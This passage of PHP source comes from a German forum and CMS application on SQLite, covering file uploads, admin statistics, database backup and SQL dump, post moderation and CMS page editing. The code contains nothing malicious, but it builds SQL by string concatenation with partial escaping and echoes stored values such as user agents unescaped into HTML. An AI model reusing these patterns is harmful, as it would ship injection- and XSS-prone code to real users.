'[useragent]' => "nullif('".$sql['es']($_SERVER['HTTP_USER_AGENT'])."','')",
'[info]' => "nullif('".$sql['es'](strtr($_POST['info'],$html))."','')"),
(
$link = $sql['sq']($conn,"select id from [file] where link is null and hash = '$crc' and abs(size) = $size")) ? array('[link]' => $link) : array(
'[size]' => $size,
'[hash]' => "'$crc'",
'[type]' => (($type) ? "nullif('".preg_replace('![^\w/ ;=+-]!','',$_FILES['file']['type'])."','')" : "null"),
'[data]' => "'".base64_encode($data)."'"));
if(isset(
$var['[data]']) and $data = $gz['deflate']($data,9) and strlen($data) < $size) {
$var['[data]'] = "'".base64_encode($data)."'";
$var['[size]'] *= -1;
}
if(
$val = $sql['sq']($conn,"select id from [file] where status is not null and user = $uid and name like ".$var['[name]']." limit 1")) {
// $sql['e']($conn,"update [file] set status = null where id = $val");
$key = array();
foreach(
$var as $k => $v)
$key[] = "$k = $v";
if(!@
$sql['e']($conn,"update [file] set\n\t".implode(",\n\t",$key)."\nwhere id = $val"))
$var = false;
}
elseif(!@
$sql['e']($conn,"insert into [file] (".implode(',',array_keys($var)).") values (".implode(',',array_values($var)).")"))
$var = false;
if(!
$var)
$out .= "<h3>Datei konnte nicht verarbeitet werden!</h3>";
}
}
elseif(isset(
$_POST['send']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)) {
$sql['e']($conn,"
update [file] set
status = "
.((int)$_POST['right'] + (int)$_POST['status']).",
name = '"
.preg_replace('/[^\w!&,.-]/','',$_POST['name'])."',
info = '"
.$sql['es']($_POST['info'])."'"
.(($status/2%2 and isset($_POST['type'])) ? ",\n\t\ttype = ".((preg_match('![\w/ ;=+-]+!',$_POST['type'],$val)) ? "'$val[0]'" : "null") : "")."
where status is not null and id =
$var[0]".(($status/2%2) ? "" : " and user = $uid "));
if(isset(
$_POST['charset']) and preg_match('/^[\w-]+$/',$_POST['charset'],$val) and $var = $sql['aq']($conn,"
select ifnull(b.id,a.id) as id,
ifnull(b.type,a.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.status is not null and ifnull(a.type,b.type) like 'text/%'"
.(($status/2%2) ? "" : " and a.user = $uid")." and a.id = $var[0]"))
$sql['e']($conn,"
update [file] set
type = '"
.preg_replace('!^([\w/-]+).*$!','$1',$var[0]['type'])."; charset=$val[0]'
where id = "
.$var[0]['id']);
}
elseif(isset(
$_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
if(
$sql['sq']($conn,"select 1+status from [file] where id = $var[0]"))
$sql['e']($conn,"update [file] set status = null where (user = $uid or $status/2%2) and id = $var[0]");
else
$sql['e']($conn,strtr("begin;
update [file] set
size = (select size from [file] where id = #),
hash = (select hash from [file] where id = #),
type = (select type from [file] where id = #),
data = (select data from [file] where id = #)
where id = (select id from [file] where link = # limit 1);
update [file] set link = (select id from [file] where link = # and data is not null)
where link = #;
update [file] set link = null where id = link;
delete from [file] where id = #;
commit;"
,array('#' => $var[0])));
elseif(
$status/2%2 and isset($_GET['restore']) and preg_match('/\d+/',$_GET['restore'],$var))
$sql['e']($conn,"
update [file]
set status = 1
where id =
$var[0]");
$data = (($status/2%2 and !is_bool($mid)) ? (($mid < 0) ? '' : "where a.user = $mid") : "where a.user = $uid and a.status is not null");
$num = $sql['sq']($conn,"select count(*) from [file] as a $data");
if(
$page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Datei?page=#key##max#&amp;user=$mid".(($sort) ? "&amp;sort=$sort" : "")."' title='#var#'>#key#</a>");
if(
$rows = $sql['aq']($conn,"
select a.name as name,
abs(ifnull(a.size,b.size)) as absize,
a.user||'-'||a.name as flink,
a.id as id,
u.username as uname,
a.ip as ip,
ifnull(a.status/2%2,1) as status,
a.status%2 as right,
a.[create],
ifnull(a.hash,b.hash) as hash,
a.info as info,
ifnull(a.type,b.type) as type,
a.useragent as agent,
a.link as link,
a.user as user,
ifnull(a.size,b.size) as size,
ifnull(length(a.data),0) as truesize,
strftime('%d.%m.%Y %H:%M:%S',a.[create]) as erstellt
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
$data".preg_replace($sorth[2],$sorth[3],'u.id,a.name;11;a.name')."
limit
$val,$max",SQLITE_ASSOC)) {
$row = array(); // user
$val = ($status/2%2 and $mid) ? "&amp;user=$mid" : false;
$key = 0;
foreach(
$rows as $var)
$row[] = "<tr><td><a href='$self/$request?id=$var[id]$val' title='Bearbeiten'>$var[name]</a></td><td align='right' title='".number_format($var['truesize'],0,',','.')." Bytes'>".number_format((($key += $a = abs($var['size'])) ? $a : 0),0,',','.')."</td>"
."<td><code><a href='$self/file?$var[flink]'>::f/$var[flink]</a></code></td>"
.(($status/2%2) ? "<td title='$var[type]'><code><a href='$self/file?$var[id]'>::f/$var[id]</a>".(($var['link']) ? "#$var[link]" : "")."</code></td><td>".(($var['uname']) ? "<a href='$self/Profil?id=".preg_replace('/-.*$/','',$var['flink'])."'>$var[uname]</a>" : "Unbekannt")."</td><td title='$var[agent]'>$var[ip]</td>" : "")
.
"<td align='center'>".(($var['status']) ? "Privat" : "<a href='$self?s=d&amp;id=$var[user]&amp;q=".urlencode($var['name'])."'>Öffendlich</a>")."</td><td align='center'>".(($var['right']) ? "Jeder" : ((is_null($var['right'])) ? "<a href='$self/$request?restore=$var[id]$val' title='Wiederherstellen'><font color='#ff0000'><b>Gesperrt</b></font></a>" : "Benutzer"))."</td>"
."<td>$var[erstellt]</td><td title='CRC32' align='center'>".(($var['hash']) ? $var['hash'] : "-/-")."</td><td>"
.@preg_replace(array_keys($creole),array_values($creole),strtr($var['info'],array_slice($html,1)))
.
"&nbsp;</td><td><a href='$self/$request?kill=$var[id]$val".(($sort) ? "&amp;sort=$sort" : "")."' title='Löschen' onclick='return confirm(\"Wirklich Löschen?\")'><b><font color='#ff0000'>X</font></b></a>";
$out .= "<fieldset><legend><b>Übersicht ".(($status/2%2) ? (($mid and $mid < 0) ? "aller" : "<a href='$self/Datei?user=-1'>aller</a>") : "Ihrer")." hochgeladenen Dateien</b></legend><table border='1'><tr>".((($var = preg_replace($sorth[0],$sorth[1],"Datei=1\tGröße=2\tDatei-Link=3\t(ID-Link=4)\t(Benutzer=5)\t(IP-Adresse=6)\tStatus=7\tRechte=8\tErstellt=9\tHash=10\tBeschreibung=11")) and $status/2%2 and $mid) ? preg_replace('/(?=sort=)/',"user=$mid&amp;",$var) : $var)."<th>&nbsp;</th></tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
$row = ($id and $row = $sql['aq']($conn,"
select a.status as status,
a.name as name,
a.info as info,
ifnull(a.type,b.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.id =
$id")) ? reset($row) : array('name' => '', 'info' => '', 'status' => 1, 'type' => '');
$val = ($status/2%2) ? (($mid == -1) ? array($key,'insgesamt belegt') : array($len,'belegt')) : array($maxfile-$len,'frei');
$out .= "<form name='file' action='$self".(($status/2%2 and $mid) ? "?user=$mid" : "")."' method='post' enctype='multipart/form-data'><table cellspacing='0' cellpadding='0'><tr><td><fieldset><legend><b>Datei-Upload <small>(".number_format(($val[0]),0,',','.')." Bytes $val[1])</small></b></legend>
<table width='100%'><tr><td width='1%'><small>Datei</small><br /><input type='file' name='file' /></td>
<td><small>Dateiname</small><br /><input type='text' name='name' value='
$row[name]' style='width:100%' /></td></tr></table>
<table width='100%'><tr><td><small>Beschreibung</small><br /><input type='text' name='info' value='"
.strtr($row['info'],array_slice($html,1))."' style='width:100%' /></td>
<td><small>Status</small><br /><select name='status' size='1'><option value='0'>Öffendlich</option><option value='2'"
.(($row['status']/2%2) ? " selected" : "").">Privat</option></select>
<td><small>Rechte</small><br /><select name='right' size='1'><option value='1'>Jeder</option><option value='0'"
.(($row['status']%2) ? "" : " selected").">Benutzer</option></select>"
.(($status/2%2 and ($row['type'] or is_null($row['type']))) ? "</td><td><small>Content-Type:"
.((preg_match('!^text/!',$row['type'])) ? " (<span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=iso-8859-1\")'>iso</span> / <span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=urf-8\")'>utf-8</span>)": '')."</small><br /><input type='text' name='type' value='$row[type]' />"
: ((preg_match('!^text/([\w-]+)(?:;\s*charset\s*=\s*([\w-]+))?$!',$row['type'],$var)) ? "</td><td><small>Charset (<span onclick='document.file.charset.value=\"iso-8859-1\"'>iso</span> / <span onclick='document.file.charset.value=\"utf-8\"'>utf-8</span>)</small><br /><input type='text' name='charset' value='".((isset($var[2])) ? $var[2] : '')."' />" : ""))."</td><td valign='bottom'>
<input type='submit' name='send' value='Hochladen' /></td></tr></table>
<input type='hidden' name='request' value='
$request' /><input type='hidden' name='id' value='$id' /><input type='hidden' name='MAX_FILE_SIZE' value='$maxfile' />
</fieldset></td></tr></table></form>"
;
}

# Administrator Werkzeuge
if($uid and $status/2%2 or $info[3] != '') {
$info[4] = "|>-\n|--[ [[^Backup]] ~| [[^CMS]] ~| [[^SQL|SQL-Konsole]] ~| [[^Status]] ]--|\n";
if(
preg_match('/^(cms|backup|sql|status)$/i',$request))
$info[8] = @preg_replace(array_keys($creole),array_values($creole),"$info[4]--");
if(
$request == 'Status' and array_sum($var = reset(($sql['aq']($conn,"
select (select count(*) from user where status/2%2),
(select count(*) from user where status%2),
(select count(*) from user where status%2 = 0),
(select sum(logins) from user),
(select sum(requests) from user),
(select count(*) from (select count(*) from [user] group by ip having count(*) > 1))"
,SQLITE_NUM))))) {
$out .= "$info[8]<table align='center'><tr><td colspan='2'><fieldset><legend><b>Allgemein</b></legend>"
."Admins: $var[0] - ".((is_array($val = $sql['sq']($conn,"select Username from user where status/2%2"))) ? implode(", ",$val) : $val)
.
" / Online: $var[1] / Offline: $var[2] / Logins: ".number_format($var[3],0,',','.')." / Zugriffe: ".number_format($var[4],0,',','.')." / Gleiche IPs: $var[5]</fieldset></td></tr>";
$out .= "<tr><td><fieldset><legend><b>Inhalte</b></legend><table border='1'><tr>"
.preg_replace($sorth[0],$sorth[1],"Art=1\tBenutzer=2\tInsgesamt=3\tÖffendlich=4\tGelöscht=5\tZuerst Erstellt=6\tZuletzt Erstellt=7\tZuletzt Geändert=8")."</tr>";
$row = array();
foreach(
$sql['aq']($conn,"
select 'Mitglieder',
(select count(profil) from user where status is not null),
(select count(*) from user where status is not null),
(select count(page) from user where status is not null),
(select count(*) from user where status is null),
(select min([create]) from user),
(select max([create]) from user),
(select max(change) from user)
union select 'Blog',
(select count(*) from (select count(*) from forum where status is not null and mailid = userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid = userid and mailid is not null),
(select count(*) from forum where status%2=0 and mailid = userid and mailid is not null),
(select count(*) from forum where status is null and mailid = userid and mailid is not null),
(select min([create]) from forum where mailid is not null and userid = mailid),
(select max([create]) from forum where mailid is not null and userid = mailid),
(select max([change]) from forum where mailid is not null and userid = mailid)
union select 'Chat',
(select count(user) from chat),
(select count(*) from chat),
(select count(*) from (select distinct u.id from user as c left join user as u on c.chat = u.id where u.id is not null and u.status/4%2 group by u.id)),
null,
(select min(time) from chat),
(select max(time) from chat),
null
union select 'CMS',
(select count(*) from user where status/2%2),
(select count(*) from cms),
(select count(*) from cms where status/8%2),
null,
(select min([create]) from cms),
(select max([create]) from cms),
(select max([change]) from cms)
union select 'Datei',
(select count(*) from (select count(*) from file where status is not null group by user)),
(select count(*) from file where status is not null),
(select count(*) from file where status%2=0),
(select count(*) from file where status is null),
(select min([create]) from file),
(select max([create]) from file),
null
union select 'Mail',
(select count(*) from (select count(*) from forum where status is not null and mailid != userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid is not null and mailid != userid),
null,
(select count(*) from forum where status is null and mailid is not null and mailid != userid),
(select min([create]) from forum where mailid is not null and userid != mailid),
(select max([create]) from forum where mailid is not null and userid != mailid),
(select max([change]) from forum where mailid is not null and userid != mailid)
union select 'Forum',
(select count(*) from (select count(*) from forum where status is not null and mailid is null group by userid)),
(select count(*) from forum where status is not null and mailid is null),
(select count(*) from forum where status%2=0 and mailid is null),
(select count(*) from forum where status is null and mailid is null),
(select min([create]) from forum where mailid is null),
(select max([create]) from forum where mailid is null),
(select max([change]) from forum where mailid is null)"
.preg_replace($sorth[2],$sorth[3],"1;8"),SQLITE_NUM) as $line)
if(
$line[2]) {
$out .= "<tr>";
foreach(
$line as $key => $var)
$out .= "<td".(($key) ? ((preg_match('/^\d*$/',$var)) ? " align='center'>".((is_null($var)) ? "-/-" : $var)
:
">".preg_replace('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/','$3.$2.$1 $4:$5',$var)) : "><a href='$self/$var'><b>$var</b></a>")."</td>";
$out .= "</tr>";
}
$out .= "</table></fieldset></td></tr></table>";
}
if(
$request == 'Backup') { // Backup Database
$var = (isset($_FILES['sqlite']['tmp_name']) and !$_FILES['sqlite']['error'] and file_exists($_FILES['sqlite']['tmp_name'])) ? $_FILES['sqlite']['tmp_name'] : "$base.gz";
if(
$query == 'reorg')
$sql['e']($conn,"vacuum");
elseif(isset(
$_POST['create']) and !file_exists("$base.gz") and ($fr=fopen($base,'rb')) and ($fw=$gz['open']("$base.gz",'wb9'))) {
while(!
feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
}
if(
$var != "$base.gz" or isset($_POST['reset'])) { // Restore
$sql['cl']($conn);
if((
$fr=$gz['open']($var,'rb')) and ($fw=fopen($base,'wb'))) {
while(!
$gz['eof']($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@
touch($base,filemtime($var));
header("Location: $self");
die(
"Weiter zum <a href='$self'>Forum</a>");
}
}
elseif(isset(
$_GET['download']) and file_exists($var = preg_replace('/\/.*$/','',$base)."/".basename($_GET['download']).strrchr($base,'.')) and is_file($var)) { // Save Fail-DB
header('Content-Type: application/octetstream');
header('Content-Disposition: filename="'.basename($var).'"');
header('Content-Length: '.filesize($var));
readfile($var);
exit();
}
elseif(isset(
$_POST['backup']) or $query == 'download') { // Save DB
$var = ($query and file_exists("$base.gz")) ? file_get_contents("$base.gz") : $gz['encode'](file_get_contents($base),9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.basename($base).'.gz"');
header('Content-Length: '.strlen($var));
die(
$var);
}
elseif(isset(
$_REQUEST['sqldump']) and $tables = $sql['q']($conn,"select name,sql from sqlite_master where type='table' and name not like 'sqlite_%'")) { // Make SQL-Dump
$eol = "\r\n";
$val = "begin;$eol";
while(
$table = $sql['fa']($tables,SQLITE_ASSOC)) {
$val .= ((isset($_REQUEST['dt'])) ? ((isset($_REQUEST['ct'])) ? "drop table" : "delete from")." [$table[name]];$eol" : "")
.((isset(
$_REQUEST['ct'])) ? "$table[sql];" : "/* ".$table['sql']." */").$eol;
if(
$lines = $sql['q']($conn,"select * from [$table[name]]")) {
$cols = $sql['nf']($lines);
$name = array();
for(
$a=0; $a<$cols; $a++)
$name[] = "[".$sql['fn']($lines,$a)."]";
while(
$line = $sql['fa']($lines,SQLITE_NUM)) {
foreach(
$line as $key => $var)
$line[$key] = (is_null($var)) ? 'null' : ((preg_match('/^(0|-?[1-9]\d*(\.\d+)?)$/',$var)) ? $var : "'".$sql['es']($var)."'");
$val .= "insert into [$table[name]] (".implode(",",$name).") values (".implode(",",$line).");$eol";
}
}
}
$val = $gz['encode']($val."commit;$eol",9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.preg_replace('/(?<=\.)\w+$/','sql',basename($base)).'.gz"');
header('Content-Length: '.strlen($val));
die(
$val);
}
else
$out .= "$info[8]<table align='center'><tr><td><fieldset><legend><b>Datenbank Backup</b></legend>
<table align='right'><tr><td><small><a href='
$self/SQL' title='SQL-Konsole'>".basename($base)."</a><br /><a href='$self/Backup?reorg' title='Datenbank reorganisieren'>".number_format(filesize($base),0, '.', ',')." Bytes</a></small></td></tr></table>
<form name='save' action='
$self/Backup' method='post'><small>SQLite-Binary:</small><br /><input type='submit' name='backup' value='Herunterladen' /><br clear='all' /><br />
<table width='100%'><tr><td><small>SQL-Dump:</small><br /><input type='submit' name='sqldump' value='Erstellen' /></td><td>
<input type='checkbox' id='ct' name='ct' value='1' checked /><label for='ct'><small>Tabellen neu erstellen</small></label><br />
<input type='checkbox' id='dt' name='dt' value='1' /><label for='dt'><small>Alte Tabellen löschen/leeren</small></label></td></tr></table></form>"
.((file_exists("$base.gz")) ? "<hr /><table align='right'><tr><td align='right'><small><a href='$self/Backup?download'>".basename($base).".gz</a><br />vom: ".date("d.m.Y H:i:s",filemtime("$base.gz"))."</small></td></tr></table>
<form name='reset' action='
$self/Backup' method='post'><small>Letzte Sicherung:</small><br /><input type='submit' name='reset' value='Zurückspielen' /></form>" : "<form name='create' action='$self/Backup' method='post'><table width='100%'><tr><td><small>Sicherung:</small></td><td align='right'><input type='submit' name='create' value='Erstellen' /></tr></table></form>")
.((
$val = glob(preg_replace('/(?=\.\w+$)/','_*',$base))) ? "<hr /><small>Defekte Datenbanken:<br />".implode("<br />",preg_replace('/^((.*?)_(\d\d)(\d\d)(\d\d)(\d\d)(\d\d)(\d\d))(\.\w+)$/',"<a href='$self/Backup?download=$1'>$2$9</a> vom: $5.$4.$3 $6:$7:$8",$val))."</small>" : '')
.
"<hr /><form enctype='multipart/form-data' name='load' action='$self/Backup' method='post'><small>Hochladen &amp; Zurückspielen:</small><br />
<input type='hidden' name='MAX_FILE_SIZE' value='"
.(preg_replace('/\D/','',ini_get('upload_max_filesize'))*1024*1024)."' />
<input type='file' name='sqlite' size='24' /><br /><input type='submit' value='Hochladen' /></form></fieldset></td></tr></table>"
;
}

# Administration von Forenbeträgen
if($request == 'Admin') {
if(isset(
$_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
$sql['e']($conn,"delete from [forum] where id=$var[0]");
elseif(isset(
$_GET['lock']) and preg_match('/\d+/',$_GET['lock'],$var))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
elseif(isset(
$_GET['save']) and preg_match('/\d+/',$_GET['save'],$var))
$sql['e']($conn,"update [forum] set status=0 where status is null and id=$var[0]");
if(isset(
$_GET['edit']) and preg_match('/\d+/',$_GET['edit'],$var)) {
if(isset(
$_POST['edit']) and isset($_POST['message']) and $_POST['message'] != '') {
$sql['e']($conn,"
update [forum] set change=datetime('now','localtime'),
changes=changes+1,
title=nullif('"
.((isset($_POST['title'])) ? $sql['es'](strtr($_POST['title'],$html)) :'')."',''),
message='"
.$sql['es'](strtr($_POST['message'],$html))."',
status=nullif('"
.preg_replace('/\D/','',$_POST['status'])."',''),
userid="
.preg_replace('/\D/','',$_POST['userid']).",
mailid=nullif('"
.preg_replace('/\D/','',$_POST['mailid'])."',''),
path=nullif('"
.preg_replace('/[^\d\/]/','',$_POST['path'])."','')
where id=
$var[0]");
$request = ($mid or $_POST['mailid']) ? (($_POST['mailid'] == $_POST['userid']) ? 'Blog' : 'Mail') : '';
if(!
$q)
$q = $var[0];
}
else {
$wrt = array();
if(
$getopt != '')
$wrt[] = $getopt;
if(
$page[1] != '')
$wrt[] = $page[1];
$wrt = "$self/Admin?".implode('&amp;',$wrt).((count($wrt) > 0) ? '&amp;' : '');
$line = reset(($sql['aq']( $conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.userid as userid,
f.mailid as mailid,
f.ip as uip,
f.useragent as ua,
f.status as status,
ifnull(f.status%2,'-1') as right,
f.path as path,
f.title as title,
f.message as message,
u.username as author
from [forum] as f
left join [user] as u on u.id = f.userid
where f.id=
$var[0]",SQLITE_ASSOC)));
foreach(
$_POST as $k => $v)
if(
preg_match('/^(title|message|userid|mailid|path|status)$/',$k))
$line[$k] = $v;
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $line['id'], 'name' => $line['id'], 'title' => $line['title'], 'from' => $line['author'], 'create' => $line['create'], 'change' => $line['change'], 'right' => $line['right']));
$array = array();
foreach(
$sql['aq']($conn,"select id,username from user") as $v) {
$array['user'][] = "<option value='$v[id]'".(($line['userid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
$array['mail'][] = "<option value='$v[id]'".(($line['mailid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
if(
$v['id'] == $line['userid'])
$line['from'] = $v['username'];
if(
$v['id'] == $line['mailid'])
$line['to'] = $v['username'];
}
$out .= "<form action='$wrt"."edit=$var[0]' method='post'><fieldset class='cr'><legend>"
.((is_null($line['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),preg_replace($phtml[0],$phtml[1],$line['title']))."</b>")." von "
.((!isset($line['from']) or is_null($line['from'])) ? "Unbekannt" : "<a href='$self/Profil?id=$line[userid]'>$line[from]</a>")
.((!isset(
$line['to']) or is_null($line['to'])) ? "" : " an <a href='$self/Profil?id=$line[mailid]'>$line[to]</a> [<font color='#".((floor($line['status']/2)) ? "00a000'>" : "a00000'>un")."gelesen</font>]")
.
" <b><a href='#edit'>Bearbeiten</a></b> <small>(<a href='$self/Source?q=$var[0]'>Quelltext</a>)</small></legend><small>Metainformationen:</small><br />
Erstellt:
$line[crdatum] / Zuletzt geändert: $line[chdatum] / Änderungen: $line[changes]<br>
IP: "
.strtr($line['uip'],$html)." / Useragent: ".strtr($line['ua'],$html)." / Status:&nbsp;".((is_null($line['status'])) ? "<font color='#ff0000'>Gesperrt</font>&nbsp;<small>(<a href='$wrt"."save=$var[0]'>Entsperren"
: "Normal&nbsp;<small>(<a href='$wrt"."lock=$var[0]'>Sperren")."</a> | <a href='$wrt"."kill=$var[0]'>Löschen</a>)</small>"
.((is_null($line['path'])) ? "" : " / <a href='$self".(($mid) ? "/Mail?user=$mid&amp;" : "?")."q=".preg_replace('!^.*/(\d+)/$!','$1',$line['path'])."'>Reference&nbsp;suchen</a>")."<hr />"
.@preg_replace(array_keys($creole),array_values($creole),strtr($line['message'],array_slice($html,1)))."<br clear='all' /><hr /><a name='edit' /><table width='100%'><tr>
<td width='99%'><small>Titel:</small><br /><input type='text' name='title' value='"
.preg_replace($phtml[0],$phtml[1],$line['title'])."' style='width:100%' /></td>
<td><small>Von:</small><br /><select name='userid' size='1'><option value='0'>Unbekannt</option>"
.implode('',$array['user'])."</select></td>
<td><small>An:</small><br /><select name='mailid' size='1'><option value=''>Forum</option>"
.implode('',$array['mail'])."</select></td>
<td><small>Status:</small><br /><input type='text' size='1' name='status' value='"
.preg_replace('/\D/','',$line['status'])."' /></td>
<td><small>Path:</small><br /><input type='text' size='10' name='path' value='"
.preg_replace('/[^\d\/]/','',$line['path'])."' /></td></tr>
<tr><td colspan='5'><small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='
$taz'>".preg_replace($phtml[0],$phtml[1],$line['message'])."</textarea><br />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='edit' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.forms[0].message.focus()//--></script>"
;
}
}
else
$request = '';
}
}
elseif(
preg_match('/Admin|Backup/',$request))
$request = '';

# Content-Management-System
if((($request == 'CMS' or isset($_REQUEST['request']) and $_REQUEST['request'] == 'CMS') and $uid) and ($status/2%2 or $status%2 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where id like '$id' or name like '".$sql['es'](trim($q))."'") == 2)) {
if(
count($_POST) and !isset($_POST['stop'])) {
$post = array('name' => '\w.-', 'content' => '^\x00');
if(
$status/2%2)
$post = array_merge($post,array('description' => '^\n', 'menu' => '\d', 'public' => '\d', 'right' => '\d-', 'id' => '\d', 'create' => '\d', 'change' => '\d'));
foreach(
$post as $key => $var)
$post[$key] = (isset($_POST[$key]) and preg_match('/['.$var.']+/',$_POST[$key],$val)) ? strtr($val[0],$html) : false;
if(isset(
$_POST['save']) and $_POST['save'] and isset($_POST['name']) and !preg_match("/^\s*$ncms\s*$/",$_POST['name'])) {
if(
$status/2%2)
$var = (int)$post['right']*2 + ((isset($post['menu'])) ? $post['menu'] : 0) + ((isset($post['public'])) ? $post['public']*8 : 0);
if(
$id)
$sql['e']($conn,"
update [cms] set
change=datetime('now','localtime'),
changes=changes+1,"
.(($status/2%2) ? "
status=
$var,
name='
$post[name]',
description=nullif('"
.$sql['es']($post['description'])."','')," : "")."
content=nullif('"
.$sql['es']($post['content'])."','')
where id =
$id");
elseif(
$status/2%2)
$sql['e']($conn,"
insert into [cms] ([create],[change],[status],[name],[description],[content])
values( datetime('now','localtime'),datetime('now','localtime'),
$var,
'
$post[name]',
nullif('"
.$sql['es']($post['description'])."',''),
nullif('"
.$sql['es']($post['content'])."',''))");
$id = $content = true;
$request = ($post['name'] != '') ? "$post[name] " : ' ';
}
elseif(isset(
$_POST['remove']) and $id and $status/2%2) {
$sql['e']($conn,"delete from [cms] where id = $id");
$id = $post = false;
}
}
else
$post = false;
if(!
$id and $q !== false)
$id = $sql['sq']($conn,"select id from [cms] where name like '".$sql['es']($q)."'");
if(!
$post and $id and $var = $sql['aq']($conn,"
select id,
name,
strftime('%s',change) as change,
strftime('%s',[create]) as 'create',
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
content
from [cms]
where id =
$id",SQLITE_ASSOC))
$post = reset($var);
elseif(!
$post)
$post = array('id' => 0, 'name' => '', 'menu' => 0, 'public' => 0, 'right' => -2, 'description' => '', 'content' => '', 'create' => '', 'change' => '');
if(
count($_POST) and $post['content'] != '' and $creolevar = array_merge($creolevar,array('type' => 'cms', 'id' => $post['id'], 'name' => $post['name'], 'create' => $post['create'],
'change' => $post['change'], 'name' => $post['name'], 'title' => $post['description'], 'right' => $post['right'], 'from' => $sql['sq']($conn,'select username from user where status/2%2 = 1'))))
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($post['content'],array_slice($html,1)))."</div>";
if(
$id or isset($post['id']))
$uedit = "CMS?id=".((isset($post['id'])) ? $post['id'] : $id);
if(
$id === false) {
$num = $sql['sq']($conn,"select count(*) from [cms]");
if(
$page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/CMS?page=#key##max#".(($sort) ? "&amp;sort=$sort" : "")."' title='#var#'>#key#</a>");
if(
$rows = $sql['aq']($conn,"
select id,
name,
[create],
change,
changes,
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
strftime('%d.%m.%Y %H:%M:%S',[create]) as erstellt,
strftime('%d.%m.%Y %H:%M:%S',change) as modifiziert
from [cms]"
.preg_replace($sorth[2],$sorth[3],"name;9;name")."
limit
$val,$max")) {
$row = array();
foreach(
$rows as $var)
$row[] = "<tr><td><a href='$self/CMS?id=$var[id]'>$var[id]</a></td><td><a href='$self".(($var['name'] == '') ? "'>Startseite" : "/$var[name]'>$var[name]" )."</a></td><td>$var[erstellt]</td><td>$var[modifiziert]</td><td align='center'>$var[changes]</td><td align='center'>".strtr($var['menu'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['public'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['right'],array(0 => 'Jeder' , 1 => 'Benutzer', 2 => 'Benutzer+', 3 => 'Admin'))."</td><td>".strtr($var['description'],array_slice($html,1))."&nbsp;</td></tr>";
$out .= "$info[8]<fieldset><legend><b>Übersichtsliste für Content-Management-System</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"ID=1\tSeite=2\tErstellt=3\tZuletzt&nbsp;Geändert=4\tGeändert=5\tMenü=6\tÖffendlich=7\tRechte=8\tBeschreibung=9")."</tr>".implode("",$row)."</table><div align='right'><a href='$self/CMS?id=0'>Neue Seite erstellen</a></div><h4 align='center'>$code</h4></fieldset>";
}
}
elseif(
$id === false)
$id = 0;
if(isset(
$_POST['stop'])) {
$id = $content = true;
$request = ($post['name'] != '') ? $post['name'] : ' ';
}
if(
$id !== false and $id !== true) {
if(
$status/2%2) {
$array = array(3 => 'Admin (Voll)', 2 => 'Benutzer (Edit)', 1 => 'Benutzer (Lesen)', 0 => 'Jeder (Lesen)');
foreach(
$array as $key => $var)
$array[$key] = "<option value='$key'".(($post['right'] == $key) ? " selected" : "").">$var</option>";
}
if(isset(
$_POST['content']) and $_POST['content'] != '')
$out .= '<br />';
$out .= "<a name='edit'></a><form action='$self/CMS?id=$id' method='post' name='cms'><fieldset class='cr'><legend><b>Content-Management-System</b> <small>(<a href='#edit'>edit</a>)</small></legend><table width='100%' border='0'>".(($status/2%2) ? "<tr><td width='20%'>
<small>Seite:</small><br /><input type='text' name='name' value='
$post[name]' style='width:100%' /></td><td width='70%'>
<small>Beschreibung:</small><br /><input type='text' name='description' value='"
.strtr($post['description'],array_slice($html,1))."' style='width:100%' /></td><td width='5%' nowrap>
<small>Optionen:</small><br /><input type='checkbox' name='menu' id='menu' value='1'"
.(($post['menu'] > 0) ? " checked" : "")." /><label for='menu'>Menü</label>
<input type='checkbox' name='public' id='public' value='1'"
.(($post['public'] > 0) ? " checked" : "")." /><label for='public'>Öffendlich</label></td><td width='5%'>
<small>Rechte:</small><br /><select name='right' size='1'>"
.implode('',$array)."</select></td></tr>" : "<input type='hidden' name='name' value='$post[name]' />")."<tr><td colspan='4'>
<small>Nachricht:</small><br /><textarea style='width:100%' name='content' cols='80' rows='
$taz'>$post[content]</textarea><br />
<input type='hidden' name='id' value='
$post[id]' />
<input type='hidden' name='create' value='
$post[create]' />
